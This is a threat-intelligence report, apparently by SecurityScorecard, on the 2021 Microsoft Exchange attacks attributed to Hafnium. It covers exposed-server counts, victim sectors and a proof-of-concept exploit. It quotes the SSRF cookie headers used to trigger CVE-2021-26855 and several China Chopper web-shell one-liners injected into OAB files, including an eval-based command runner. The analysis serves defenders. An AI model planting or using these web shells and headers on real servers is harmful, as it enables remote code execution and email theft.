Updated December 24, 2021.
Executive Summary
Microsoft recently revealed that its Microsoft Exchange email service was the target of a successful cyberattack. The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack, learn more about the threat actors, and identify potential victims.
Although initially thought to have affected as many as 30,000-100,000 organizations, our analysis indicates that the number is far less than that. Using our proprietary technology to scan the internet for vulnerable, public-facing Microsoft Exchange servers revealed 2,500- 18,000 vulnerable public-facing servers worldwide, a majority of which are in Europe, the Middle East, and Africa (EMEA). However, the vast majority of the victims were located in the United States and Germany, demonstrating a strong degree of intentionality by the perpetrators.
While our investigation is still ongoing, to date we have identified 302 unique organizations that were impacted across 10 different industry sectors. Nevertheless, despite the announcement of this intrusion, as of March 15, 2021 failure to install the necessary patch has left over 2,500 servers still vulnerable.
Other published assessments of the attack have concluded primary adversary for this attack according to open source information is Hafnium, a Chinese advanced persistent threat (APT) group. Our analysis confirms that the initial proof of concept exploit code was written by Chinese speakers, however, we are unable to confirm at this time whether the perpetrators are positively associated with Hafnium.
Background
A cyber threat group, identified by Microsoft as Hafnium, conducted a major cyber offensive operation between early January and March 6, 2021. This operation targeted Microsoft® Exchange servers using several 0-day, or previously unknown, vulnerabilities that enabled the attackers to execute remote code to manipulate the victim’s systems.
The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack and learn more about the threat actors and identify any potential victims.
Key Findings
Updated December 24, 2021
- Discovery of ‘in the wild’ exploit code written by Chinese-speaking authors on GitHub. These exploits give the attacker the ability to dump the email contents of the Exchange Server.
- Despite early reports of 30-100,000 victims, we were only able to observe approximately 18,000 public-facing vulnerable servers, including instances of Outlook Web Access that are usually linked to internal Exchange servers. We are unable to explain the discrepancy without knowing more about the data upon which the original reporting relied.
- While the majority of vulnerabilities were found in Europe, the Middle East, and Africa, the majority of victims were found in the United States with a similar number in Germany.
- We were able to identify 302 compromised organizations in at least 10 different industry sectors. We managed to deduce the identity of 173 organizations. As a matter of policy, we do not name victims of attacks.
- We found evidence that may indicate more than one attacker at work in the victims’ systems as it appears other cyber threats are rushing to exploit the vulnerabilities


Vulnerability Analysis
The vulnerabilities identified in this attack include CVE-2021-26857, CVE-2021-27065 & CVE-2021-26855. These vulnerabilities are part of an exploitation chain that when executed successfully in succession allows the attacker to conduct remote code execution within the victim’s Microsoft Exchange server, enabling additional intrusions inside the network.
In this case, we found evidence that China Chopper was being dropped on exploited systems via these vulnerabilities. We dug a little deeper to see if we could uncover the origins of these vulnerabilities. We were able to find evidence that proof of concept code had been developed to utilize these exploits.
Exploit Code Discovery
During our investigation, we looked for the existence of exploit code using these CVEs in the wild. We found discussions in social media and forum chatter about using CVE-2021-26855 to dump the contents of email.


Fig 1. Twitter posting (note screenshots have Chinese characters in them).
This led to identifying individual GitHub accounts posting just this sort of code. The author associated with one account developed the original exploit code for CVE-2021-26855 written in GoLang. The other author created tools to dump the contents of email from Exchange servers. We were able to connect these accounts to two Chinese-speaking authors.


F 1.2 GitHub account belonging to author of email dumping Proof Of Concept
Proof of concept code that utilized these specific vulnerabilities has been discussed in places such as CVEBase. The exploit code repository was taken down, however other GitHub accounts are making reference to GreyOrder being the original author. We were able to find the original post by GreyOrder even though it was deleted through cached reference to the post.


Fig 1.3 CVEBase


Fig 1.4 POC discussion on GitHub
The following is what was found posted from GreyOrder on March 3, 2021, only to be later removed from repositories.


Fig 1.5 Original GitHub posting for GreyOrder POC exploit
GreyOrder discloses some of the conditions to trigger the vulnerability and how this tool, written in GoLang, can be used to download the contents of email from the affected Microsoft Exchange server. In order to trigger the vulnerability, a few conditions have to exist.
- The targeted Microsoft Exchange server must be a load balancing server (two or more servers must be used at the same time).
- The FQDN of the targeted internal Microsoft Exchange server must be known. It can be captured via a NTLM type 2 message.
- For email content retrieval, the target email address must be known. Email addresses can be directly enumerated.
The general behavior of this proof of concept exploit code is generally outlined below.
- The script first checks if the server is vulnerable in the same way that Microsoft’s nmap script does, sending a request to
https:///owa/auth/x.js with headers
- Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;.
- Then they obtain the FQDN by sending a NTLM type 2 message to
https:///ews/exchange.asmx. they send XML SOAP requests to https:///ecp/temp.js with the following headers:
Cookie: X-BEResource=%s/EWS/Exchange.asmx?a=~1942062522; Content-Type: text/xml


Fig 1.6 Proof of Concept Exploit Demonstration
We discovered the GreyOrder GitHub account has existed since 2018 with little associated activity. We can assess with moderate confidence that GreyOrder developed the first proof of concept exploit code prior to the disclosure.


Fig 1.7 GreyOrder GitHub
Scope and Impact
The impact of this attack was initially reported as affecting 30,000 to 100,000 organizations running Microsoft Exchange. Our analysis assessed how many actual on-premise Exchange servers are exposed given that Microsoft asserted in its advisory on March 2, 2021, that Exchange Online (O365) was not vulnerable. Some key points and questions we identified in our analysis.
- What is the total population of exposed Microsoft Exchange Servers regardless of version on the Internet during the time period of analysis? This enables us to make a general assessment about the potential attack surface.
- Microsoft released a detection script (to our collective benefit) for identifying vulnerable on-prem Microsoft Exchange servers but then proceeded to update that script two times, first adding the ability to detect Exchange 2013 installations and later to better handle service redirects (httpd response code 301 and 302) after receiving feedback that there were false negatives in the scanning results.
- From our analysis and scans, we believe significantly fewer than 30,000 organizations were affected. Our data shows 18,000 organizations may have been vulnerable to this attack. To date, we’ve been able to identify 302 unique organizations that were impacted.
- How many Microsoft Exchange servers still remain unpatched to CVE-2021-26855? First, we wanted to clarify that we are only able to detect servers that are vulnerable to the Server Side Request Forgery (SSRF) Vulnerability. The other vulnerabilities are dependent upon this CVE being successfully exploited to execute arbitrary code. We believe as of March 15, 2021, that over 2,500 servers are still vulnerable.
What did we see?
Threat Actor
The primary adversary for this attack according to open source information is Hafnium. According to Microsoft reporting, Hafnium is a sophisticated Chinese APT group operating against various industry sectors. While our discovery of Chinese-speaking authors of the initial proof of concept exploit code only further solidifies Microsoft’s reporting on Hafnium, we are unable to confirm at this time if those authors are positively associated with Hafnium.
Attack Surface
Using our proprietary technology to scan the Internet for public-facing Exchange servers vulnerable to CVE-2021-26855 reveals that a majority predominantly appear in Europe, the Middle East, and Africa (EMEA). We focused on public-facing Exchange servers that we could confirm as being still vulnerable or unpatched. We found less than 18,000 vulnerable public-facing servers world-wide through our research and analysis.
Discrepancy in Vulnerable Server numbers
We can’t definitively say what drove the initial reports of significantly more organizations being hacked. It may be based on internal Microsoft telemetry of Exchange servers sold, or it may include servers behind a firewall which we would not be able to observe. Our numbers represent the number of Exchange servers that we observed from the Internet which is less than 18,000. Without additional information about the data upon which those reports were based, we can only speculate as to the discrepancy. As our research continues we will update our reporting with any evidence we observe regarding these larger numbers of vulnerable servers.


Fig 1.8 Still Vulnerable Microsoft Exchange Servers CVE-2021-26855 (includes scans for outlook web access and on-premise)


Fig 1.9 Microsoft Exchange Servers exposed on the Internet (includes Outlook Web Access and on-premise)
Malware Involved
During our investigations, we focused on some of the technical aspects of the attacks such as the malware involved. We detected several malware files known as web shells related to this attack that were tagged as exploit CVE-2021-26855 & CVE-2021-27065. i.e. the web shells were specifically designed to be used with these vulnerabilities.
China Chopper
The adversary used the China Chopper web shell in this targeted attack.
The China Chopper web shell has two components: server-side and client-side. The client-side component is an executable with a Graphical User Interface that provides an interface with the server-side component. Unlike other web shells that provide an HTML interface on the hacked server so that the attacker can interact with it when visiting the webpage containing the China Chopper web shell, no content is shown. Therefore, the attacker needs to use the client-side in order to interact with the China Chopper web shell. The client-side component provides the following capabilities on the affected server:
- file management
- database management
- virtual terminal
The server-side component is very short and simple, which makes it harder to detect. During the attacks related to the Microsoft Exchange vulnerabilities, we observed two types of China Chopper web shell.
The first type is injected in the ExternalUrl field of the OAB (Offline Address Book) files. It checks if there are any files uploaded with the request and if yes, it saves it locally as an independent ASPX file.
The following example has a hardcoded ASPX file name:
- ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“<aspx_file_name>”));}}</script>
We only observed the hardcoded value of “error.aspx”. However, we also observed a use case in which the file name and file content are sent as two different HTTP parameters and the web shell saves the given content in the specified file name:
- ExternalUrl: http://g/<script runat=””server””>protected void Page_Load(object sender, EventArgs e){System.IO.StreamWriter sw = new System.IO.StreamWriter(Request.Form[“”p””] , false, Encoding.Default);sw.Write(Request.Form[“”f””]);sw.Close();}</script>”
The second example seems to be an evolution of the attack, probably in an attempt to make sure the file name is not exposed in the OAB file, to allow the attacker to upload more than one file, or to allow the attacker to randomly generate the file name.
The second type is also injected in the ExternalUrl field of the OAB files, but the injected content is different. It reads the value of an HTTP parameter and executes it on the server. An example of such an web shell is:
- http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“<parameter_name>”],”unsafe”);}</script>
Since the attacker chooses the value for <aspx_file_name> in the first case and <parameter_name> in the second case, it is possible that these different approaches may indicate the presence of two different attackers.
As of the date of publication, we detected 366 variants of the web shell that contained details of the victims’ Microsoft Exchange environment. Out of the 366 web shell samples, 337 were using HTTP parameters and 28 were using individual ASPX files.
Since the web shell was injected into the OAB files which are configuration files containing information about the servers they are running on, we managed to obtain the list of domains for the infected servers. Some of them are local domains while others are public.
The following is a list of distinct HTTP parameter values we observed along with the number of unique servers the attackers managed to infect:


Fig 2 – Distribution of ChinaChopper web shell parameters
Apart from these, we observed two clusters of similarly-looking parameter names, which suggests that two attackers are generating a unique parameter name for each infected server. We observed each of these parameter names were used only once. The first cluster has parameter values that look like these: rxDg52fHL9GW, WHotfJjxFadX, EiH4yV2WGYgc, while the second one: 26c7d6bd63f345f9fea2797a57c1ac33, 2380d9e018988768600d9f3195b0095d, ce62a4a53e118ff82150522c663ddae6.
A full example of an infected OAB file from an infected Microsoft Exchange server follows:


Full OAB file
Victimology
One objective of the analysis was to understand the victimology of this attack and determine if it aligns with a typical nation-state cyber offensive operation. We started with analyzing the discovered web shells and their capabilities, then we focused on identifying victims. Most of the web shells were modified versions of the China Chopper web shell repurposed for this attack. The OAB files containing the web shells were initially created in 2013, 2014, 2016, and 2017, with the last modification date of March 5, 2021. The last modification date might suggest the time at which the web shell was added to the OAB files. Additional research into the web shell dropped on compromised assets post-exploitation revealed some victim identities. From our research, we discovered 366 web shells (302 of which were unique) that contained detailed information about victim Exchange environments. We were able to identify at least 173 unique organizations that had been compromised as a result of this vulnerability in their public-facing Exchange servers. The overwhelming majority of victims are in the United States and Germany. This shows the intentionality of the attacker, especially considering that the vulnerability was predominantly in EMEA.


Fig 2.1 Distribution of web shell Victims
While a full analysis of identified victims is still ongoing, we have been able to identify a partial list of sectors of victimized organizations found to have been targeted by the China Chopper web shell. We plan on updating this research in the future.


Fig 2.2 Sector Victimology
We found cases in which the domains for the URLs specified in the OAB files are local and we wonder whether this means that there are infected Microsoft Exchange servers that are not publicly exposed to the Internet.
Other web shells
In addition to China Chopper, we discovered other web shell code designed to check if products from FireEye®, CrowdStrike®, and CarbonBlack® are present. The code writes a response back depending on a condition of true [See below “if..fireeye…write 1”, “if..confer (CarbonBlack) write 2”, “if…crowdstrike…write3”]. We believe the attacker is likely collecting this information in an effort to understand victim environmental details. This web shell would allow for additional malware to be deployed to terminate the security software.


0ba9a76f55aaa495670d74d21850d0155ff5d6a5
The presence of this functionality demonstrates not only intentionality but sophistication that would elevate this attack beyond what a cyber crime group would be interested in conducting.
Analysis of Competing Hypothesis
The analysis of competing hypotheses, also known as ACH, is an intelligence analytical model intended to rank evidence against plausible scenarios. There are multiple hypotheses that we rank different evidence against that either support or do not support that specific hypothesis.
Hypotheses | Evidence that supports | Evidence that disproves |
30,000 to 100,000 Microsoft Exchange servers are compromised |
| |
GreyOrder is a member of Hafnium |
|
|
Techniques, Tactics & Procedures support a Nation State cyber offensive operation |
|
Conclusion
While our research into this intrusion is continuing, we believe that our initial findings support, but do not confirm, Microsoft’s attribution to a Chinese APT group known as Hafnium. From our research we believe the authors of related proof of concept code were Chinese-speaking; the attackers targeted organizations primarily in the United States and Germany; the initial group of sectors is similar to those sectors previously targeted by Hafnium; and the attacker demonstrated sophistication in maintaining persistence within the victim’s network. While the vulnerability may be currently being exploited by ransomware criminals we believe the original attack was the work of a nation-state actor. Our research is ongoing and will be updated as appropriate.
—

